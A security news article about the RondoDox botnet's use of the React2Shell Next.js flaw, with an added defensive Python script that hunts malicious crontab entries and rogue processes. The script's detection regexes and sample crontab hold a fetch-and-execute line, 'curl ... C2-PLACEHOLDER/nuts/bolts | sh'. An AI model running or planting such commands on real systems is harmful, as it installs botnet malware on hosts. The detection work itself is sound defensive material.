Cybersecurity researchers have detailed a sustained nine-month campaign targeting both IoT devices and web applications, ultimately conscripting them into the RondoDox botnet. As of December 2025, CloudSEK analysis confirms the campaign is actively exploiting the recently disclosed React2Shell vulnerability (CVE-2025-55182, CVSS 10.0) as a primary entry vector.
React2Shell affects React Server Components (RSC) and Next.js, enabling unauthenticated remote code execution across exposed environments. Despite public disclosure, the Shadowserver Foundation reports that approximately 90,300 systems remain vulnerable as of December 31, 2025. The majority, around 68,400, are located in the United States, with additional exposure noted in Germany (4,300), France (2,800), and India (1,500).
RondoDox Campaign
First observed in early 2025, RondoDox has steadily expanded its operational scope, incorporating multiple N-day vulnerabilities such as CVE-2023-1389 and CVE-2025-24893. Abuse of React2Shell for propagation has been independently validated by Darktrace, Kaspersky, and VulnCheck, further highlighting the breadth of exploitation in the wild.
Researchers outline three clear phases leading up to the mass exploitation of CVE-2025-55182:
March – April 2025: Manual reconnaissance and vulnerability enumeration
April – June 2025: Daily broad-spectrum probing targeting platforms such as WordPress, Drupal, Struts2, and IoT hardware including Wavlink routers
July – Early December 2025: Large-scale automated deployment occurring hourly
In December 2025 incidents, adversaries were observed scanning for vulnerable Next.js servers before attempting to deliver multiple payloads: cryptocurrency miners (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a Mirai-derived binary (/nuts/x86).
Malware Behaviour and Persistence Mechanisms
The /nuts/bolts component maintains botnet control. It terminates competing malware families and coin miners, then retrieves the primary bot binary from its command-and-control infrastructure. Certain variants extend this behaviour by removing Docker-based payloads, historical artefacts from previous intrusions, and associated cron jobs. Persistence is commonly achieved through modifications to /etc/crontab.
CloudSEK notes that the tool “continuously scans /proc to enumerate running executables and kills non-whitelisted processes every ~45 seconds,” which effectively suppresses reinfection attempts from other actors.
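As a defender-side counterpart to the behaviour described above, here is an added Python hunting helper (not CloudSEK's tooling and not anything from the campaign): it parses /etc/crontab for fetch-and-execute or staging-directory entries, and walks /proc, the same view the bot scans, to list processes whose binary was deleted after launch or sits outside trusted system directories. The trusted-directory list, the regexes, the sample crontab and the C2-PLACEHOLDER host are all assumptions constructed for the example.

```python
import os
import re

# Locations a legitimate system cron job or daemon is expected to execute from (assumption).
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/", "/opt/", "/etc/", "/lib/", "/lib64/")
# World-writable staging dirs used by download-and-run loaders; fetch-then-execute shape.
STAGING_RE = re.compile(r"(^|\s|=)(/tmp|/var/tmp|/dev/shm)/")
FETCH_RE = re.compile(r"\b(curl|wget|tftp)\b.*?(\||;|&&).*?\b(sh|bash|chmod)\b")

def cron_command(line):
    """Command part of an /etc/crontab entry; None for comments, blanks and KEY=VALUE."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    nfields = 3 if line.startswith("@") else 7  # '@reboot user cmd' vs five time fields
    parts = line.split(None, nfields - 1)
    return parts[-1] if len(parts) == nfields else None

def suspicious_cron_entries(crontab_text):
    """(line_no, reason, command) for entries that fetch-and-run or start from staging dirs."""
    findings = []
    for no, line in enumerate(crontab_text.splitlines(), 1):
        cmd = cron_command(line)
        if cmd and FETCH_RE.search(cmd):
            findings.append((no, "fetch-and-execute", cmd))
        elif cmd and STAGING_RE.search(cmd):
            findings.append((no, "runs from staging dir", cmd))
    return findings

def untrusted_processes(proc_root="/proc"):
    """(pid, exe) for processes whose binary was deleted after launch or sits outside TRUSTED_DIRS."""
    findings = []
    pids = filter(str.isdigit, os.listdir(proc_root)) if os.path.isdir(proc_root) else []
    for pid in pids:
        try:
            exe = os.readlink(os.path.join(proc_root, pid, "exe"))
        except OSError:
            continue  # kernel thread, already exited, or not inspectable as this user
        if exe.endswith(" (deleted)") or not exe.startswith(TRUSTED_DIRS):
            findings.append((pid, exe))
    return findings

# Constructed sample: a stock Debian line plus two RondoDox-style additions
# (C2-PLACEHOLDER stands in for the real host, which the article does not give).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot         root    /tmp/.x/bolts >/dev/null 2>&1
*/5 *   * * *   root    curl -s http://C2-PLACEHOLDER/nuts/bolts | sh
"""
```

Run `suspicious_cron_entries(open("/etc/crontab").read())` and `untrusted_processes()` as root on a suspect host; the sample flags lines 3 and 4 and leaves the stock entry alone.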
Recommended Actions
To reduce exposure to this campaign, organisations should:
Upgrade Next.js installations to versions patched against CVE-2025-55182
Segment IoT devices into isolated VLANs
Deploy Web Application Firewalls (WAFs) capable of blocking known exploit patterns
Monitor for anomalous or untrusted process activity
Block known C2 infrastructure associated with RondoDox
Source of information: The Hacker News